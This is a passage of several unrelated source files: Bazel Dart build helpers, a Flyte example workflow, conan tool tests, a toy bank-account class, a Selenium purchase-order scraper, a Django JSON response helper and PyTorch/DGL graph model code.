base.playSfx(self.swimSound, looping=1)
return Task.cont
def enterSlowWalking(self):
self.accept(base.localAvatar.uniqueName('positiveHP'), self.__handlePositiveHP)
base.localAvatar.startTrackAnimToSpeed()
base.localAvatar.setWalkSpeedSlow()
def __handlePositiveHP(self):
self.fsm.request('walking')
def exitSlowWalking(self):
base.localAvatar.stopTrackAnimToSpeed()
self.ignore(base.localAvatar.uniqueName('positiveHP'))
|
# Copyright 2016 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Internal implemenation utility functions for Dart rules.
WARNING: NOT A PUBLIC API.
This code is public only by virtue of the fact that Bazel does not yet support
a mechanism for enforcing limitied visibility of Skylark rules. This code makes
no gurantees of API stability and is intended solely for use by the Dart rules.
"""
_third_party_prefix = "third_party/dart/"
def assert_third_party_licenses(ctx):
"""Asserts license attr on non-testonly third-party packages."""
if (not ctx.attr.testonly
and not ctx.attr.license_files
and ctx.label.package.startswith(_third_party_prefix)):
fail("%s lacks license_files attribute, " % ctx.label +
"required for all non-testonly third-party Dart library rules")
def collect_files(dart_ctx):
srcs = dart_ctx.srcs
data = dart_ctx.data
for d in dart_ctx.transitive_deps.values():
srcs = srcs + d.dart.srcs
    data = data + d.dart.data
return (srcs, data)
def _collect_transitive_deps(deps):
"""Collects transitive closure of deps.
Args:
deps: input deps Target collection. All targets must have a 'dart' provider.
Returns:
Transitive closure of deps.
"""
transitive_deps = {}
for dep in deps:
transitive_deps.update(dep.dart.transitive_deps)
transitive_deps["%s" % dep.dart.label] = dep
return transitive_deps
def _label_to_dart_package_name(label):
"""Returns the Dart package name for the specified label.
Packages under //third_party/dart resolve to their external Pub package names.
All other packages resolve to a unique identifier based on their repo path.
Examples:
//foo/bar/baz: foo.bar.baz
//third_party/dart/args: args
//third_party/guice: third_party.guice
Restrictions:
Since packages outside of //third_party/dart are identified by their path
components joined by periods, it is an error for the label package to
contain periods.
Args:
label: the label whose package name is to be returned.
Returns:
The Dart package name associated with the label.
"""
package_name = label.package
if label.package.startswith(_third_party_prefix):
third_party_path = label.package[len(_third_party_prefix):]
if "/" not in third_party_path:
package_name = third_party_path
if "." in package_name:
fail("Dart package paths may not contain '.': " + label.package)
return package_name.replace("/", ".")
def _new_dart_context(label,
package,
lib_root,
srcs=None,
data=None,
deps=None,
transitive_deps=None):
return struct(
label=label,
package=package,
lib_root=lib_root,
srcs=srcs or [],
data=data or [],
deps=deps or [],
transitive_deps=dict(transitive_deps or {}),
)
def make_dart_context(label,
package=None,
lib_root=None,
srcs=None,
data=None,
deps=None):
if not package:
package = _label_to_dart_package_name(label)
if not lib_root:
lib_root = "%s/lib/" % label.package
srcs = srcs or []
data = data or []
deps = deps or []
transitive_deps = _collect_transitive_deps(deps)
return struct(
label=label,
package=package,
lib_root=lib_root,
srcs=srcs,
data=data,
deps=deps,
transitive_deps=transitive_deps,
)
def _merge_dart_context(dart_ctx1, dart_ctx2):
"""Merges two dart contexts whose package and lib_root must be identical."""
if dart_ctx1.package != dart_ctx2.package:
fail("Incompatible packages: %s and %s" % (dart_ctx1.package,
dart_ctx2.package))
if dart_ctx1.lib_root != dart_ctx2.lib_root:
fail("Incompatible lib_roots for package %s:\n" % dart_ctx1.package +
" %s declares: %s\n" % (dart_ctx1.label, dart_ctx1.lib_root) +
" %s declares: %s\n" % (dart_ctx2.label, dart_ctx2.lib_root) +
"Targets in the same package must declare the same lib_root")
  transitive_deps = dict(dart_ctx1.transitive_deps)
  transitive_deps.update(dart_ctx2.transitive_deps)
return _new_dart_context(
label=dart_ctx1.label,
package=dart_ctx1.package,
lib_root=dart_ctx1.lib_root,
srcs=dart_ctx1.srcs + dart_ctx2.srcs,
data=dart_ctx1.data + dart_ctx2.data,
deps=dart_ctx1.deps + dart_ctx2.deps,
transitive_deps=transitive_deps,
)
def _collect_dart_context(dart_ctx, transitive=True, include_self=True):
"""Collects and returns dart contexts."""
# Collect direct or transitive deps.
dart_ctxs = [dart_ctx]
if transitive:
dart_ctxs += [d.dart for d in dart_ctx.transitive_deps.values()]
else:
dart_ctxs += [d.dart for d in dart_ctx.deps]
# Optionally, exclude all self-packages.
if not include_self:
dart_ctxs = [c for c in dart_ctxs if c.package != dart_ctx.package]
# Merge Dart context by package.
ctx_map = {}
for dc in dart_ctxs:
if dc.package in ctx_map:
dc = _merge_dart_context(ctx_map[dc.package], dc)
ctx_map[dc.package] = dc
return ctx_map
def package_spec_action(ctx, dart_ctx, output):
"""Creates an action that generates a Dart package spec.
Arguments:
ctx: The rule context.
dart_ctx: The Dart context.
output: The output package_spec file.
"""
# There's a 1-to-many relationship between packages and targets, but
# collect_transitive_packages() asserts that their lib_roots are the same.
dart_ctxs = _collect_dart_context(dart_ctx,
transitive=True,
include_self=True).values()
# Generate the content.
content = "# Generated by Bazel\n"
for dc in dart_ctxs:
relative_lib_root = _relative_path(dart_ctx.label.package, dc.lib_root)
content += "%s:%s\n" % (dc.package, relative_lib_root)
# Emit the package spec.
ctx.actions.write(
output=output,
content=content,
)
def _relative_path(from_dir, to_path):
"""Returns the relative path from a directory to a path via the repo root."""
return "../" * (from_dir.count("/") + 1) + to_path
def layout_action(ctx, srcs, output_dir):
"""Generates a flattened directory of sources.
For each file f in srcs, a file is emitted at output_dir/f.short_path.
Returns a dict mapping short_path to the emitted file.
Args:
ctx: the build context.
srcs: the set of input srcs to be flattened.
output_dir: the full output directory path into which the files are emitted.
Returns:
A map from input file short_path to File in output_dir.
"""
commands = ["@echo off"]
output_files = {}
# TODO(cbracken) extract next two lines to func
if not output_dir.endswith("/"):
output_dir += "/"
for src_file in srcs:
dest_file = ctx.actions.declare_file(output_dir + src_file.short_path)
dest_dir = dest_file.path[:dest_file.path.rfind("/")]
link_target = _relative_path(dest_dir, src_file.path)
#commands += ["ln -s '%s' '%s'" % (link_target, dest_file.path)]
# Turns out "mklink.exe" does not function, but "mklink" does.
commands += ["mklink \"%s\" \"%s\"" % (dest_file.path.replace("/", "\\"), link_target.replace("/", "\\"))]
output_files[src_file.short_path] = dest_file
# Emit layout script.
layout_cmd = ctx.actions.declare_file(ctx.label.name + "_layout.cmd")
ctx.actions.write(
output=layout_cmd,
content="\n".join(commands),
is_executable=True,
)
# Invoke the layout action.
ctx.actions.run(
inputs=list(srcs),
outputs=output_files.values(),
executable=layout_cmd,
progress_message="Building flattened source layout for %s" % ctx,
mnemonic="DartLayout",
)
return output_files
|
"""
Hello World
------------
This simple workflow calls a task that returns "Hello World" and then just sets that as the final output of the workflow.
"""
import typing
# %%
# All imports at the root flytekit level are stable and we maintain backwards
# compatibility for them.
from flytekit import task, workflow
# %%
# Here we define a task called ``say_hello``. Note the @task decorator: Flyte
# uses this to understand that you intend to port this function to Flyte.
# Plain functions in this file that lack the @task decorator are not
# accessible to Flyte.
# You can change the signature of the task to take in an argument like this:
# def say_hello(name: str) -> str:
@task
def say_hello(name: str) -> str:
return f"hello world, {name}"
# %%
# Here we declare a workflow called ``my_wf``. Note the @workflow decorator:
# Flyte finds all workflows that you have declared by looking for this decorator.
# A @workflow function looks like a regular python function, but with one
# important difference: it is never executed by the flyte-engine. It is
# pseudo code that is analyzed by flytekit and converted to Flyte's native
# workflow representation. Thus variables such as the return values of `tasks`
# are not real values, and trying to interact with them like regular variables
# will result in an error. For example, if a task returns a boolean and you
# try to test the truth value of this boolean, an error will be raised. The
# reason is that the tasks are not really executed by the function; they run
# remotely and their return values are supplied to subsequent tasks.
#
# You can treat the outputs of a task as you normally would a Python function. Assign the output to two variables
# and use them in subsequent tasks as normal. See :py:func:`flytekit.workflow`
# You can change the signature of the workflow to take in an argument like this:
# def my_wf(name: str) -> str:
@workflow
def my_wf(name: str) -> str:
res = say_hello(name=name)
return res
# %%
# Execute the Workflow, simply by invoking it like a function and passing in
# the necessary parameters
#
# .. note::
#
#   One thing to remember: currently we only support ``keyword arguments``, so
#   every argument should be passed in the form ``arg=value``. Failure to do so
#   will result in an error.
if __name__ == "__main__":
print(f"Running my_wf(name='flo') {my_wf(name='flo')}")
# %%
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from conan_clang_update.conan_clang_update import Command
import platform
def is_macos():
return 'Darwin' in platform.system()
def test_update_clang_remote_project():
""" Clone dummy project and update it.
"""
args = ['--remote', 'uilianries/conan-base64', '--skip-push']
command = Command()
command.run(args)
def test_update_clang_filter_branch():
""" Clone dummy project, filter by branch and update it.
"""
args = ['--remote', 'uilianries/conan-base64', '--skip-push', '--branch-pattern', 'testing/*']
command = Command()
command.run(args)
def test_update_clang_remote_user_branch_pattern():
""" Clone all projects, filter by branch and update it.
"""
    # XXX (uilianries): Requests to the GitHub API sometimes fail on Mac jobs
if is_macos():
return
args = ['--remote', 'uilianries', '--skip-push', '--branch-pattern', 'testing/*']
command = Command()
command.run(args)
def test_update_clang_remote_user_project_pattern():
""" Clone only filtered projects and update it.
"""
    # XXX (uilianries): Requests to the GitHub API sometimes fail on Mac jobs
if is_macos():
return
args = ['--remote', 'uilianries', '--skip-push', '--project-pattern', 'uilianries/conan-*']
command = Command()
command.run(args)
def test_update_clang_remote_user_project_branch_pattern():
""" Clone only filtered projects, filter by branch and update it.
"""
    # XXX (uilianries): Requests to the GitHub API sometimes fail on Mac jobs
if is_macos():
return
args = [
'--remote', 'uilianries', '--skip-push', '--project-pattern', 'uilianries/conan-*',
'--branch-pattern', 'testing/*'
]
command = Command()
command.run(args)
def test_update_clang_remote_user():
""" Clone all projects and update it.
"""
    # XXX (uilianries): Requests to the GitHub API sometimes fail on Mac jobs
if is_macos():
return
args = ['--remote', 'uilianries', '--skip-push']
command = Command()
command.run(args)
|
class Account:
"""
Account for a bank client.
"""
prefix = 'GIRO'
def __init__(self, newname, balance=0):
self.name = newname
self.balance = balance
def deposit(self, amt):
self.balance += amt
def withdraw(self, amt):
self.balance -= amt
def __str__(self):
return "{} | {:10s}:{:10.2f}".format(self.prefix, self.name, self.balance)
@staticmethod
def info_text():
"""Static methods belong to a class, but know nothing about it."""
return """This is a bank account. It keeps your money safe."""
@classmethod
def prefix_text(cls):
"""Class methods belong to a class, but know nothing about its instances."""
return """Bank account has the prefix: {}.""".format(cls.prefix)
if __name__ == '__main__':
a = Account('Adam', 100)
print(a)
a.deposit(50)
print(a)
a.withdraw(10)
print(a)
print(a.info_text())
print(a.prefix_text())
print(Account.info_text())
print(Account.prefix_text())
|
import datetime
import json
import os
import time
import sys
import pickle
import jsonpickle
from selenium import webdriver
from webdriver_manager.chrome import ChromeDriverManager
from selenium.webdriver.chrome.options import Options
from data.WebOrderLine import WebOrderLine
from tools.CNMWebOrdersScrapper import CNMWebOrdersScrapper
import pandas as pd
def main():
"""
Clase principal que ejecuta una serie de pasos con el objetivo de acceder y guardar (serializar, json y csv) todos los datos de las ordenes de compra
(del imb-cnm-csic) de un periodo de tiempo marcado por dos años (parámetros de entrada) dado un usuario y pass determinado.
Más tarde dicho csv puede ser importado por un programa de tratamiento de datos como excel y realizar filtros (p.e. por proveedor, etc...)
:return: None
"""
    # retrieve the arguments passed on the call to main
argumentsList = sys.argv[1:]
login_url = argumentsList[0]
orders_url = argumentsList[1]
user = argumentsList[2]
password = argumentsList[3]
    # first year with records on the cnm purchasing website
first_count_year = int(argumentsList[4])
from_year = int(argumentsList[5])
    # correct from_year if it is earlier than the first year for which the cnm purchasing website has records
if from_year < first_count_year:
from_year = first_count_year
to_year = int(argumentsList[6])
    # correct to_year if it is later than the current year
if to_year > datetime.datetime.now().year:
to_year = datetime.datetime.now().year
savingFilePath = argumentsList[7]
    # options in case we want to work in silent mode, etc.
options = Options()
# options.add_argument('--headless')
# options.add_argument('--disable-gpu') # Last I checked this was necessary.
driver = webdriver.Chrome(ChromeDriverManager().install(), options=options)
    # create the scraper
cnmWebOrdersScrapper = CNMWebOrdersScrapper(driver,
login_url,
orders_url,
user,
password,
first_count_year,
from_year,
to_year)
    # log in to the cnm intranet
cnmWebOrdersScrapper.doLogin()
    # navigate to a specific page of the cnm intranet
cnmWebOrdersScrapper.goToPage(orders_url)
webOrders = list()
    # retrieve all the data for the orders placed and registered on the cnm website for the user given as an input parameter
for y in range(from_year, to_year + 1):
        # once on the purchase-request listing page of the cnm intranet, go to the listing for year y
cnmWebOrdersScrapper.goToPageOfYear(y)
        # wait for the page to load
time.sleep(1)
        # collect the codes of the orders placed in year y; they are needed to access each purchase order
yearOrdersList = cnmWebOrdersScrapper.getActualYearPage_OrdersList()
for code, usuario, fecha, centro_coste, vendedor, importe, estado in yearOrdersList:
            # access the purchase order identified by its code
cnmWebOrdersScrapper.goToOrderPage(code)
            # wait for the page to load
time.sleep(2)
            # collect the purchase-order data
webOrderData = cnmWebOrdersScrapper.getOrderData()
webOrderData.codigo = code
webOrderData.usuario = usuario
webOrderData.fecha = fecha
webOrderData.centro_coste = centro_coste
webOrderData.vendedor = vendedor
webOrderData.total = importe
webOrderData.status = estado
webOrders.append(webOrderData)
    # dump the purchase orders in webOrders to a file using pickle
pickle_file = open(savingFilePath + '/cnmOrders.pickle', 'wb')
pickle.dump(webOrders, pickle_file)
    # dump the purchase orders in webOrders to a human-readable text file (json)
json_pickle_file = open(savingFilePath + '/cnmOrders.json', 'w')
json_pickle_file.write(jsonpickle.encode(webOrders, unpicklable=False))
    # dump the purchase-order lines in webOrders to a human-readable text file (csv)
allWebOrders_Lines = list()
for webOrder in webOrders:
for webOrderLine in webOrder.lineas:
try:
webOrderLine.product.vendedor = webOrder.vendedor
                webOrderLine.fechaCompra = webOrder.fecha  # date on which a new purchase request is registered
                # in the cnm administration purchasing system
except KeyError:
                # orders whose status is not 'Passada a comanda' may have no history.
                # in those cases do nothing; just print a message and continue with the process
print("Pedido sin historia. No es posible acceder a la fecha del pedido")
allWebOrders_Lines.append(webOrderLine)
    # transform all the purchase orders into a json object
wolsJSONData = json.dumps(allWebOrders_Lines, indent=4, cls=WebOrderLine.WebOrderLineEncoder)
print(wolsJSONData)
    # transform the json into a pandas DataFrame (intermediate step so pandas can be used to save the purchase orders as csv)
df = pd.read_json(wolsJSONData)
    # dump the purchase orders to csv
df.to_csv(savingFilePath + '/cnmOrders.csv', encoding='utf-8', index=False)
    # finish up
driver.close()
if __name__ == "__main__":
main()
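# Illustrative invocation of this scraper (a sketch only; the script name and every value below are
# placeholders, and the positional arguments follow the order read from sys.argv above):
#   python scrape_cnm_orders.py <login_url> <orders_url> <user> <password> 2008 2015 2021 ./output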
|
"""
@author: liyao
@contact: liyao2598330@126.com
@software: pycharm
@time: 2020/3/30 11:41 PM
@desc:
"""
import json
import datetime
import functools
from django.http import HttpResponse
from echidna.settings import HttpResponseMessage
# json cannot serialize datetime values; the DateEncoder class is defined to handle datetime serialization
class DateEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, datetime.datetime):
return obj.strftime("%Y-%m-%d %H:%M:%S")
else:
return json.JSONEncoder.default(self, obj)
# rewrite the dumps method with a partial function so that it supports serializing datetime values
json.dumps = functools.partial(json.dumps, cls=DateEncoder)
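# Minimal usage sketch of the patched json.dumps (values are illustrative):
#   json.dumps({'now': datetime.datetime(2020, 3, 30, 23, 41)})
#   -> '{"now": "2020-03-30 23:41:00"}'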
class CommonReturn(object):
"""
    Common response helper: wraps a django HttpResponse object and automatically converts the given parameters to json.
"""
    # business return codes
success = 0
failed = -1
    # default http status codes
http_response_default_code = 200
http_response_success_code = 200
http_response_failed_code = 200
http_response_message = HttpResponseMessage()
def __call__(self, *args, **kwargs):
"""
:param response_code:
:param kwargs:
:return:
"""
return self.return_data(args, kwargs)
@staticmethod
def handle_data_type(args: (list, dict), kwargs: dict) -> None:
assert 'code' not in kwargs.keys() or 'code' in kwargs.keys() and \
isinstance(kwargs['code'], int), kwargs['code']
assert not args or isinstance(args[0], (list, dict)), args
def SUCCESS(self, *args: (dict, list), **kwargs) -> HttpResponse:
"""
Success message return format
        if args exist, the parameters in kwargs will be overridden
>>> response = CommonReturn()
>>> response.SUCCESS(msg="hello world")
'<HttpResponse status_code=200, "application/json">'
>>> response.SUCCESS(msg="hello world").getvalue()
'b\'{"code": 0, "msg": "hello world"}\''
:param response_code: set http response code
:return:
"""
self.handle_data_type(args, kwargs)
code = kwargs['code'] if 'code' in kwargs.keys() else self.success
kwargs['response_code'] = kwargs['response_code'] if 'response_code' in kwargs.keys() else \
self.http_response_success_code
return self.return_data(args, kwargs, code=code)
def FAILED(self, *args: (dict, list), **kwargs) -> HttpResponse:
"""
Failure message return format
        if args exist, the parameters in kwargs will be overridden
>>> response = CommonReturn()
>>> response.FAILED(msg="have some error")
'<HttpResponse status_code=500, "application/json">'
>>> response.FAILED(msg="have some error").getvalue()
'b\'{"code": -1, "msg": "have some error"}\''
:param response_code: set http response code
:return:
"""
self.handle_data_type(args, kwargs)
code = kwargs['code'] if 'code' in kwargs.keys() else self.failed
kwargs['response_code'] = kwargs['response_code'] if 'response_code' in kwargs.keys() else \
self.http_response_failed_code
return self.return_data(args, kwargs, code=code)
def return_data(self, args: tuple, kwargs: dict, code: int = None):
response = {}
response_code = self.http_response_default_code
for k in kwargs.keys():
if k == 'response_code':
assert isinstance(kwargs[k], int), kwargs[k]
response_code = kwargs[k]
http_response_message = self.http_response_message(code=response_code)
for key in ['msg', 'mood']:
if key not in kwargs.keys():
response[key] = http_response_message[key]
else:
response[k] = kwargs[k]
if not code and response_code != 200:
response['code'] = self.failed
else:
response['code'] = code if isinstance(code, int) else self.success
if args:
response = args[0]
try:
return HttpResponse(json.dumps(response, ensure_ascii=False), content_type="application/json, charset=utf-8",
status=response_code)
except UnicodeEncodeError:
return HttpResponse(json.dumps(response), content_type="application/json, charset=utf-8",
status=response_code)
|
import torch
from torch import distributions as D
import dgl
import numpy as np
class embedding(torch.nn.Module):
'''in_dim, out_dim'''
def __init__(self, in_dim, out_dim, in_num_channels):
super(embedding, self).__init__()
self.conv1d_1 = torch.nn.Conv1d(in_num_channels, 8, 3, stride=1, padding=1, padding_mode='replicate')
self.conv1d_2 = torch.nn.Conv1d(8, 32, 5, stride=1, padding=2, padding_mode='replicate')
self.conv1d_3 = torch.nn.Conv1d(32, 8, 7, stride=3, padding=3, padding_mode='replicate')
self.conv1d_4 = torch.nn.Conv1d(8, 1, 7, stride=3, padding=3, padding_mode='replicate')
self.hidden_dim = np.floor((in_dim+2)/3).astype(float)
self.hidden_dim = np.floor((self.hidden_dim+2)/3).astype(int)
self.fc1 = torch.nn.Linear(self.hidden_dim, out_dim, bias=True)
self.pool = torch.nn.MaxPool1d(3, stride=1, padding=1)
self.bn = torch.nn.BatchNorm1d(num_features=out_dim)
self.reset()
def reset(self):
gain = torch.nn.init.calculate_gain('leaky_relu', 0.2)
torch.nn.init.xavier_normal_(self.fc1.weight, gain=gain)
torch.nn.init.xavier_normal_(self.conv1d_1.weight, gain=gain)
torch.nn.init.xavier_normal_(self.conv1d_2.weight, gain=gain)
torch.nn.init.xavier_normal_(self.conv1d_3.weight, gain=gain)
torch.nn.init.xavier_normal_(self.conv1d_4.weight, gain=gain)
def forward(self, h):
X = self.conv1d_1(h)
X = torch.nn.functional.leaky_relu(X)
X = self.conv1d_2(X)
X = torch.nn.functional.leaky_relu(X)
X = self.pool(X)
X = self.conv1d_3(X) # ceil( (Lin+2)/3 )
X = torch.nn.functional.leaky_relu(X)
X = self.conv1d_4(X) # ceil( (Lin+2)/3 )
X = torch.nn.functional.leaky_relu(X)
X = self.pool(X)
X = self.fc1(X)
X = torch.squeeze(X, dim=1)
X = self.bn(X)
return X
class encoder_chain(torch.nn.Module):
def __init__(self, in_dim, hidden_dim, out_dim, num_heads, etypes):
super(encoder_chain, self).__init__()
self.num_heads = num_heads
l1 = dict()
for et in etypes:
l1[et] = dgl.nn.GATConv( in_dim, hidden_dim,
num_heads=1, residual=False,
allow_zero_in_degree=True)
self.layer1 = dgl.nn.HeteroGraphConv( l1, aggregate = self.agg_func1)
l2 = dict()
for et in etypes:
l2[et] = dgl.nn.GATConv( hidden_dim, hidden_dim,
num_heads=1, residual=False,
allow_zero_in_degree=True)
self.layer2 = dgl.nn.HeteroGraphConv( l2, aggregate = self.agg_func2)
lMH = dict()
for et in etypes:
lMH[et] = dgl.nn.GATConv( hidden_dim, out_dim,
num_heads=num_heads, residual=False,
allow_zero_in_degree=True)
self.layerMHs = dgl.nn.HeteroGraphConv( lMH, aggregate=self.agg_funcMH)
self.fc1 = torch.nn.Linear(len(etypes)*hidden_dim, hidden_dim, bias=True)
self.fc2 = torch.nn.Linear(len(etypes)*hidden_dim, hidden_dim, bias=True)
# self.fc2 = torch.nn.Linear(len(etypes), len(etypes), bias=False)
self.fcmh = torch.nn.Linear(len(etypes), len(etypes), bias=False)
gain = torch.nn.init.calculate_gain('leaky_relu', 0.2)
torch.nn.init.xavier_uniform_(self.fc1.weight, gain=gain)
torch.nn.init.xavier_uniform_(self.fc2.weight, gain=gain)
torch.nn.init.xavier_uniform_(self.fcmh.weight, gain=gain)
def agg_func1(self, tensors, dsttype):
concated = torch.cat(tensors, dim=-1)
res = self.fc1(concated)
return res
def agg_func2(self, tensors, dsttype):
# stacked = torch.stack(tensors, dim=-1)
concated = torch.cat(tensors, dim=-1)
res = self.fc2(concated)
return res # torch.mean(res, dim=-1)
def agg_funcMH(self, tensors, dsttype):
stacked = torch.stack(tensors, dim=-1)
res = self.fcmh(stacked)
return torch.mean(res, dim=-1)
def norm_(self, x):
xp = torch.cat([torch.zeros((1,3), device=x.device), x[0:-1, :]], dim=0)
dx = x - xp
dx = torch.nan_to_num(dx, nan=0)
dmean = torch.median( torch.norm(dx, dim=-1))+1e-4
x = torch.cumsum(torch.div(dx, dmean)*1.0, dim=0)
return x
def forward(self, g, x, lr_ranges, etypes, ntype):
subg_interacts = g.edge_type_subgraph(etypes)
# sub_0 = g.edge_type_subgraph([etypes[0]])
# lr_ranges = torch.cat( ( 0.8*torch.ones((1), device=lr_ranges.device), lr_ranges.view(-1,),
# torch.tensor(float('inf'), device=lr_ranges.device).view(-1,) ),
# dim=0).float().to(lr_ranges.device)
h = self.layer1(subg_interacts, {ntype[0]: x })
h = torch.squeeze(h[ntype[0]], dim=1)
h = self.layer2(subg_interacts, {ntype[0]: h })
x = torch.squeeze(h[ntype[0]], dim=1)
h_res = x
h = self.layerMHs(subg_interacts, {ntype[0]: x })
res = list()
for i in torch.arange(self.num_heads):
x = h[ntype[0]][:,i,:]
x = self.norm_(x)
x = torch.nan_to_num(x, nan=0.0, posinf=100.0, neginf=-100.0)
# dist = torch.distributions.Normal(x, 0.1*torch.ones_like(x))
# x = dist.rsample()
res.append(x)
res = torch.stack(res, dim=1)
return res, h_res
class decoder_euclidean(torch.nn.Module):
def __init__(self):
super(decoder_euclidean, self).__init__()
def edge_distance(self, edges):
dist = torch.norm((edges.dst['h'] - edges.src['h']), dim=-1, keepdim=True)
return {'distance_score': dist}
def forward(self, graph, h, etype):
with graph.local_scope():
graph.ndata['h'] = h # assigns 'h' of all node types in one shot
graph.apply_edges(self.edge_distance, etype=etype)
return graph.edges[etype].data.pop('distance_score') # graph.edges[etype].data['dotproduct_score'],
class decoder_similarity(torch.nn.Module):
def __init__(self):
super(decoder_similarity, self).__init__()
# def edge_distance(self, edges):
# cos = torch.nn.CosineSimilarity(dim=-1, eps=1e-6)
# output = cos(edges.dst['h'], edges.src['h'])
# return {'cosine_score': output}
def forward(self, graph, h, etype):
with graph.local_scope():
graph.ndata['h'] = h # assigns 'h' of all node types in one shot
# graph.apply_edges(self.edge_distance, etype=etype)
graph.apply_edges(dgl.function.u_dot_v('h', 'h', 'similarity_score'), etype=etype)
res = graph.edges[etype].data.pop('similarity_score')
return res.clamp(min=-0.9)
class decoder_distance(torch.nn.Module):
''' num_heads, num_clusters, ntype, etype '''
def __init__(self, num_heads, num_clusters, ntype, etype):
        # True: increasing, False: decreasing
super(decoder_distance, self).__init__()
self.num_heads = num_heads
self.num_clusters = num_clusters
self.ntype = ntype
self.etype = etype
self.w = torch.nn.Parameter(torch.ones( (self.num_heads)), requires_grad=True)
self.register_parameter('w', self.w)
# torch.nn.init.uniform_(self.w, a=-10.0, b=10.0)
def edge_distance(self, edges):
n2 = torch.norm((edges.dst['z'] - edges.src['z']), dim=-1, keepdim=False)
weight = torch.nn.functional.softmax(self.w.clamp(min=-3.0, max=3.0), dim=0)
dist = torch.sum(n2*weight, dim=-1, keepdim=True)
# std, mean = torch.std_mean(n2, dim=-1, unbiased=False, keepdim=False)
return {'dist_pred': dist}
def forward(self, g, h):
with g.local_scope():
g.nodes[self.ntype].data['z'] = h
g.apply_edges(self.edge_distance, etype=self.etype)
return g.edata.pop('dist_pred') #, g.edata.pop('std')
class decoder_gmm(torch.nn.Module):
def __init__(self, num_clusters):
super(decoder_gmm, self).__init__()
self.num_clusters = num_clusters
self.k = torch.nn.Parameter( torch.ones(self.num_clusters), requires_grad=True)
ms = torch.linspace(0, 4.0, steps=self.num_clusters, dtype=torch.float, requires_grad=True)
self.means = torch.nn.Parameter( ms, requires_grad=True)
self.distance_stdevs = torch.nn.Parameter( 0.3*torch.ones((self.num_clusters)), requires_grad=True)
inter = torch.linspace(start=0, end=0.1, steps=self.num_clusters)
self.interval = torch.nn.Parameter( inter, requires_grad=False)
self.cweight = torch.nn.Parameter( torch.zeros((self.num_clusters)), requires_grad=True)
self.bias = torch.nn.Parameter( torch.linspace(1e-8, 1e-5, steps=self.num_clusters, dtype=torch.float), requires_grad=False)
# gmm
def fc(self, stds_l, stds_r, k):
k = torch.sigmoid(k.clamp(min=-torch.log(torch.tensor(9.0)), max=9.0))
rate = torch.div(stds_l, stds_r)
kr = (k*rate).clamp(min=1e-8, max=0.9) # must < 1
return stds_l * torch.sqrt( -2.0*torch.log(kr) + 1e-8 )
def forward(self, distance):
cweight = torch.nn.functional.softmax(self.cweight.view(-1,), 0)
mix = D.Categorical(cweight)
stds = torch.relu(self.distance_stdevs) + 1e-3
d_left = self.fc(stds, stds, self.k)
d_left = torch.cumsum(d_left, dim=0)
d_right = self.fc(stds[0:-1], stds[1:], self.k[1:])
d_right = torch.cat( (torch.zeros(1, device=d_right.device), d_right), dim=0)
# d_right = torch.cumsum(d_right, dim=0)
means = (d_left + d_right)
means = (means + self.interval).clamp(max=5.0)
# activate = torch.nn.LeakyReLU(0.01)
# means = activate(self.means).clamp(max=4.5)
# means = torch.nan_to_num(means, nan=4.5)
# means = means + self.interval
# stds = torch.relu(self.distance_stdevs) + 1e-3
mode = torch.exp(means - stds**2)
_, idx = torch.sort(mode.view(-1,), dim=0, descending=False)
means = means[idx]
stds = stds[idx]
dis_cmp = D.Normal(means.view(-1,), stds.view(-1,))
dis_gmm = D.MixtureSameFamily(mix, dis_cmp)
data = torch.log(distance).view(-1,1)
unsafe_dis_cmpt_lp = dis_gmm.component_distribution.log_prob(data)
dis_cmpt_lp = torch.nan_to_num(unsafe_dis_cmpt_lp, nan=-float('inf'))
dis_cmpt_p = torch.exp(dis_cmpt_lp) * (dis_gmm.mixture_distribution.probs).view(1,-1) + self.bias
dis_cmpt_p = torch.nn.functional.normalize(dis_cmpt_p, p=1, dim=1)
dis_cmpt_lp = torch.log(dis_cmpt_p)
return [dis_cmpt_lp.float()], [dis_gmm]
def save_model_state_dict(models, optimizer, path, epoch=None, loss=None):
state_dict = {
'embedding_model_state_dict': models['embedding_model'].state_dict(),
'encoder_model_state_dict': models['encoder_model'].state_dict(),
'decoder_distance_model_state_dict': models['decoder_distance_model'].state_dict(),
'decoder_gmm_model_state_dict': models['decoder_gmm_model'].state_dict(),
'decoder_euclidean_model_state_dict': models['decoder_euclidean_model'].state_dict(),
'decoder_simlarity_model_state_dict': models['decoder_similarity_model'].state_dict(),
'optimizer_state_dict': optimizer.state_dict()
}
if epoch is not None:
state_dict['epoch'] = epoch
if loss is not None:
state_dict['nll_loss'] = loss
torch.save(state_dict, path)
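# Illustrative call (a sketch; assumes `models` is a dict holding the six model objects under the keys
# read above - 'embedding_model', 'encoder_model', 'decoder_distance_model', 'decoder_gmm_model',
# 'decoder_euclidean_model', 'decoder_similarity_model' - and `optimizer` is a torch optimizer):
#   save_model_state_dict(models, optimizer, 'checkpoint.pt', epoch=10, loss=nll_loss)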
def save_model_entire():
pass
"""
# for i, et in enumerate(etypes):
# x = self.layerConstruct(subg_interacts, x, [lr_ranges[i], lr_ranges[i+2]], et)
class ConstructLayer(torch.nn.Module):
def __init__(self):
super(ConstructLayer, self).__init__()
# src: h1 -> dst: h0
def edge_scale(self, edges):
d = edges.dst['z'] - edges.src['z']
z2 = torch.norm(d, dim=-1, keepdim=True) + 1e-5
clamp_d = torch.div(d, z2)*(z2.float().clamp(min=self.le, max=self.ge))
return {'e': clamp_d}
def message_func(self, edges):
return {'src_z': edges.src['z'], 'e': edges.data['e'], 'dst_z': edges.dst['z']}
def reduce_func(self, nodes):
h = torch.mean( nodes.mailbox['src_z'] + nodes.mailbox['e'], dim=1)
return {'ah': h}
def forward(self, graph, h, lr_ranges, etype):
self.le, self.ge = lr_ranges
with graph.local_scope():
graph.ndata['z'] = h
graph.apply_edges(self.edge_scale, etype=etype)
graph.update_all(self.message_func, self.reduce_func, etype=etype)
res = graph.ndata.pop('ah')
return res"""
"""class constrainLayer(torch.nn.Module):
def __init__(self, in_dim):
super(constrainLayer, self).__init__()
self.alpha_fc = torch.nn.Linear(in_dim, 1, bias=True)
self.beta_fc = torch.nn.Linear(in_dim, 1, bias=True)
